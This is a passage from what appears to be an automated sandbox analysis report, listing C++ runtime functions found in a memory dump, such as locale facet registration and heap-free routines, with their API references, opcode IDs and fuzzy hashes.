                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorLast
                                                                                                            • String ID: C
                                                                                                            • API String ID: 3291180501-1037565863
                                                                                                            • Opcode ID: 19d99d6331f91fd426a2ae1c6812dbba832424c3ae55c1c0639e9d6a8ecbed85
                                                                                                            • Instruction ID: 140a03c877b8ae2763e99a5afeb4eb023bef63c25f0ca63de64be793181158f9
                                                                                                            • Opcode Fuzzy Hash: 19d99d6331f91fd426a2ae1c6812dbba832424c3ae55c1c0639e9d6a8ecbed85
                                                                                                            • Instruction Fuzzy Hash: DDC14A75A012199BDB24CF28C995B9DB7F8FF49304F5085AAE84DA7390E731AE90DF40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F065681, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F065688
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F065692
                                                                                                            • int.LIBCPMT ref: 6F0656A9
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0656E3
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F065703
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065710
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06571D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 3920336645-0
                                                                                                            • Opcode ID: a15cc81070a22cf4bd7867f48526b46e6bc097b65eeb3781431eb724a0c1ae73
                                                                                                            • Instruction ID: 14f898f53643ffd12c7355212039c740929d5f6069663ffd3f7648b3cce13b42
                                                                                                            • Opcode Fuzzy Hash: a15cc81070a22cf4bd7867f48526b46e6bc097b65eeb3781431eb724a0c1ae73
                                                                                                            • Instruction Fuzzy Hash: 2221D275904729DBCF12DFA4CA447BEBBB2BF45728F644509E8146B3C1CBB09A11CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057D9F, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057DA6
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057DB0
                                                                                                            • int.LIBCPMT ref: 6F057DC7
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057E01
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057E21
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057E2E
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057E3B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 3920336645-0
                                                                                                            • Opcode ID: 914c515ce4cd085fa717c9631795854425726545fa8d2995c96d6d6a63a29ecc
                                                                                                            • Instruction ID: 29c03b0df334488b9de46ef62ddbf356835d52c2dc64a9034ec855aff6649ad0
                                                                                                            • Opcode Fuzzy Hash: 914c515ce4cd085fa717c9631795854425726545fa8d2995c96d6d6a63a29ecc
                                                                                                            • Instruction Fuzzy Hash: F321C375900729DBCF01DFA4CA417AE77B2AF49714F24450AE8146B2C1CBB49E21DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09D4AB, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F09D196: _free.LIBCMT ref: 6F09D1BB
                                                                                                            • _free.LIBCMT ref: 6F09D4F9
                                                                                                              • Part of subcall function 6F091434: HeapFree.KERNEL32(00000000,00000000,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?), ref: 6F09144A
                                                                                                              • Part of subcall function 6F091434: GetLastError.KERNEL32(?,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?,?), ref: 6F09145C
                                                                                                            • _free.LIBCMT ref: 6F09D504
                                                                                                            • _free.LIBCMT ref: 6F09D50F
                                                                                                            • _free.LIBCMT ref: 6F09D563
                                                                                                            • _free.LIBCMT ref: 6F09D56E
                                                                                                            • _free.LIBCMT ref: 6F09D579
                                                                                                            • _free.LIBCMT ref: 6F09D584
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                            • Instruction ID: 00fd5a655ef350daad25bf58c216a07a86bcd47fff65a1c165316015cb0849cd
                                                                                                            • Opcode Fuzzy Hash: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                            • Instruction Fuzzy Hash: 6E118432582B05B6EB21AB70DC15FCB77AE5F04788F405915E2E9670D1F734B505A760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F051C96, Relevance: 10.6, APIs: 7, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F051C9D
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F051CA7
                                                                                                            • int.LIBCPMT ref: 6F051CBE
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • numpunct.LIBCPMT ref: 6F051CE1
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F051CF8
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F051D18
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F051D25
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3064348918-0
                                                                                                            • Opcode ID: bf88c4fac2177f688092af6f34f40b1d952dc6e2fe0899f269e8335574e2167f
                                                                                                            • Instruction ID: a34c01a6416878e9034ee6f479dda0e654291a92a579f0d3b97843436974708d
                                                                                                            • Opcode Fuzzy Hash: bf88c4fac2177f688092af6f34f40b1d952dc6e2fe0899f269e8335574e2167f
                                                                                                            • Instruction Fuzzy Hash: 6311E1319006299BCF059FA4CA447ADB7B2AF45328F244449E414AF3C1CFB5A926CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F056F12, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F056F19
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F056F23
                                                                                                            • int.LIBCPMT ref: 6F056F3A
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • codecvt.LIBCPMT ref: 6F056F5D
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F056F74
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F056F94
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F056FA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                            • String ID:
                                                                                                            • API String ID: 2133458128-0
                                                                                                            • Opcode ID: 1f02383431417d2e704364c962b834b55c1670b1b20104cb882e2e2e9e3fc011
                                                                                                            • Instruction ID: 85b59cda0a89e93237c071790bb2503c759ee2962e28c5fb5a31d7c51450fc83
                                                                                                            • Opcode Fuzzy Hash: 1f02383431417d2e704364c962b834b55c1670b1b20104cb882e2e2e9e3fc011
                                                                                                            • Instruction Fuzzy Hash: 2C01D231E00629DBCF05DBA0CB447ADB7B2BF86328F240409E4156B2D0CFB4AD228B81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057738, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F05773F
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057749
                                                                                                            • int.LIBCPMT ref: 6F057760
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F057783
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05779A
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0577BA
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0577C7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            • Opcode ID: 9d26d92e8c060d0257d123f3dd47935e691cb2c9337b93a5ae4dd15e3336a598
                                                                                                            • Instruction ID: 2202175d39c90a027f92a567e874e341179d5f5882a8e245b5dc20a5c03d4cf6
                                                                                                            • Opcode Fuzzy Hash: 9d26d92e8c060d0257d123f3dd47935e691cb2c9337b93a5ae4dd15e3336a598
                                                                                                            • Instruction Fuzzy Hash: E401D63590062E9BCF05DBA4CA41BBD77B5AF45328F24444AD8146F2C0DFB09925DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F056FA7, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F056FAE
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F056FB8
                                                                                                            • int.LIBCPMT ref: 6F056FCF
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • codecvt.LIBCPMT ref: 6F056FF2
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057009
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057029
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057036
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                            • String ID:
                                                                                                            • API String ID: 2133458128-0
                                                                                                            • Opcode ID: da26cb1b05b8f07a3536060ba6ab2847f0b462ee36f01cbe38119aa585f59052
                                                                                                            • Instruction ID: c1f8c565873c5761431f9c5c992b2a65f77eee82ebd4b15613fdebb6ebd282f9
                                                                                                            • Opcode Fuzzy Hash: da26cb1b05b8f07a3536060ba6ab2847f0b462ee36f01cbe38119aa585f59052
                                                                                                            • Instruction Fuzzy Hash: 2201D235900629DBCF05DFA0CA44BBDBBB2BF45768F244509E411AB2C0CFB0E926CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0577CD, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0577D4
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0577DE
                                                                                                            • int.LIBCPMT ref: 6F0577F5
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F057818
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05782F
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F05784F
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F05785C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            • Opcode ID: b8b25c2c48a4c15bd7b1b39a42223906b2e60c2727b22c81157e10f7df7a6922
                                                                                                            • Instruction ID: 91d9a76fcd2510f328f2a5486b8dafc50b1ca1fcf6f1d4269a4c966109dda005
                                                                                                            • Opcode Fuzzy Hash: b8b25c2c48a4c15bd7b1b39a42223906b2e60c2727b22c81157e10f7df7a6922
                                                                                                            • Instruction Fuzzy Hash: F501D67190072A9BCF05DB64CA417BD7BB6BF45728F244509D8106F2C1CFF0A922DB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F05760E, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057615
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05761F
                                                                                                            • int.LIBCPMT ref: 6F057636
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F057659
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057670
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057690
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F05769D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            • Opcode ID: 53eec97619b4877f7de97ee24ee3df925bb6e9ee75f541197ab2a5c39a9fae90
                                                                                                            • Instruction ID: 4bb1edc71a674681838f9a71042ee6961a25195a102d308e61c3c41f11600035
                                                                                                            • Opcode Fuzzy Hash: 53eec97619b4877f7de97ee24ee3df925bb6e9ee75f541197ab2a5c39a9fae90
                                                                                                            • Instruction Fuzzy Hash: 6601D2319046299BCF05DFA4CA80BBD77B2BF89328F244509D415AB2C0CFB4A9629B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0576A3, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0576AA
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0576B4
                                                                                                            • int.LIBCPMT ref: 6F0576CB
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F0576EE
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057705
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057725
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057732
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            • Opcode ID: da1c2e017b4db7a04026c77da39b19ac149d1f09fe5ca3c81c45dd04067f2add
                                                                                                            • Instruction ID: 6d307cef2d3d7ef327241f59986be55c2b1e906198aa412c0975feb227e1ae17
                                                                                                            • Opcode Fuzzy Hash: da1c2e017b4db7a04026c77da39b19ac149d1f09fe5ca3c81c45dd04067f2add
                                                                                                            • Instruction Fuzzy Hash: 8101D23590462D9BCF05DBA4CB44BBEB7B2BF85328F244409D8116B2C1CFB0A926DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F065557, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06555E
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F065568
                                                                                                            • int.LIBCPMT ref: 6F06557F
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F0655A2
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0655B9
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0655D9
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0655E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            • Opcode ID: 82a4d11eb1b3109ef3482a49506c1f3a633d6e9f55916059a67c8d14a1f3a0ec
                                                                                                            • Instruction ID: 826464c08333a62bf2303974e91dc2eb45b5aa4834feafb2aa3ec9c39f4052f0
                                                                                                            • Opcode Fuzzy Hash: 82a4d11eb1b3109ef3482a49506c1f3a633d6e9f55916059a67c8d14a1f3a0ec
                                                                                                            • Instruction Fuzzy Hash: 8F01F53A904729DBCF05DBA8CA547BD77B2BF85368F240509E4116B3C1DFB4AA52CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0654C2, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0654C9
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0654D3
                                                                                                            • int.LIBCPMT ref: 6F0654EA
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F06550D
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F065524
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F065544
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065551
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            • Opcode ID: 7f5efa1ec43b459f97a789edfc51d6b2168b44ae7cd35aa9052db226b29c08a6
                                                                                                            • Instruction ID: 9f070d5edea40ddc154b5beeb207c4d746b677adeb816319792b3fca2be7afcb
                                                                                                            • Opcode Fuzzy Hash: 7f5efa1ec43b459f97a789edfc51d6b2168b44ae7cd35aa9052db226b29c08a6
                                                                                                            • Instruction Fuzzy Hash: 7D01D639900625DBCF05DBA8CA547BD77B2AF45328F240409D8116B3C1DFB0D955CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F065303, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06530A
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F065314
                                                                                                            • int.LIBCPMT ref: 6F06532B
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • messages.LIBCPMT ref: 6F06534E
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F065365
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F065385
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065392
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                            • String ID:
                                                                                                            • API String ID: 958335874-0
                                                                                                            • Opcode ID: 66ba1d9f3965d7129c39076002f0efdb2bad12e8e6cd4a5a7a5c5d49088ef6b6
                                                                                                            • Instruction ID: c53367e5da18076c775b8cc2f6761c4e97f8ed00adfcba9b3de2d9db95452efa
                                                                                                            • Opcode Fuzzy Hash: 66ba1d9f3965d7129c39076002f0efdb2bad12e8e6cd4a5a7a5c5d49088ef6b6
                                                                                                            • Instruction Fuzzy Hash: 1101D635900625DBCF05DBA4CA407BDB7B2BF45728F244509E4116B2D1DFB0DE16CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057325, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F05732C
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057336
                                                                                                            • int.LIBCPMT ref: 6F05734D
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • messages.LIBCPMT ref: 6F057370
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057387
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0573A7
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0573B4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                            • String ID:
                                                                                                            • API String ID: 958335874-0
                                                                                                            • Opcode ID: 70a9f0e8a8a4549c25dbf9a1852c8ac23e281f55042a4921a1fe3906325a9cb9
                                                                                                            • Instruction ID: 1289b44a8b868c25471322ab210e593818f281368adeda875eacd70a10ff5302
                                                                                                            • Opcode Fuzzy Hash: 70a9f0e8a8a4549c25dbf9a1852c8ac23e281f55042a4921a1fe3906325a9cb9
                                                                                                            • Instruction Fuzzy Hash: 6C01D2319006299BCF05DBB4CB417ADB7B2BF45328F24404AE8116F3C0CFB0AA26DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057B4B, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057B52
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057B5C
                                                                                                            • int.LIBCPMT ref: 6F057B73
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • numpunct.LIBCPMT ref: 6F057B96
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057BAD
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057BCD
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057BDA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3064348918-0
                                                                                                            • Opcode ID: f461684dcc3cd167481320f616ee3ae41a26550e6c32e6800f1ce4ebd4e8dc80
                                                                                                            • Instruction ID: 2950db66ebe7ac7b1417a3be6e7b22a3d8238e3bcdaba23f943bc6d4ffb75648
                                                                                                            • Opcode Fuzzy Hash: f461684dcc3cd167481320f616ee3ae41a26550e6c32e6800f1ce4ebd4e8dc80
                                                                                                            • Instruction Fuzzy Hash: FA01D671900629DBCF05DB60CA447BDB7B6BF45328F24800AE4116B2C0DFB4AD629B81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F051A42, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F051A49
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F051A53
                                                                                                            • int.LIBCPMT ref: 6F051A6A
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • codecvt.LIBCPMT ref: 6F051A8D
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F051AA4
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F051AC4
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F051AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                            • String ID:
                                                                                                            • API String ID: 2133458128-0
                                                                                                            • Opcode ID: d50f8c349dd0531da59e0d2fa437c82151a0957e5f2b2dedac860bf96025c0bd
                                                                                                            • Instruction ID: 45f6a2f9fca8454532838dc4ce70f9d2e774dc7a261a51ecebfd21d3b6c87b45
                                                                                                            • Opcode Fuzzy Hash: d50f8c349dd0531da59e0d2fa437c82151a0957e5f2b2dedac860bf96025c0bd
                                                                                                            • Instruction Fuzzy Hash: 710184359006299BCF05DFA4CA407ADB7B1AF45328F24050AE4156B2D0DFB499658B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

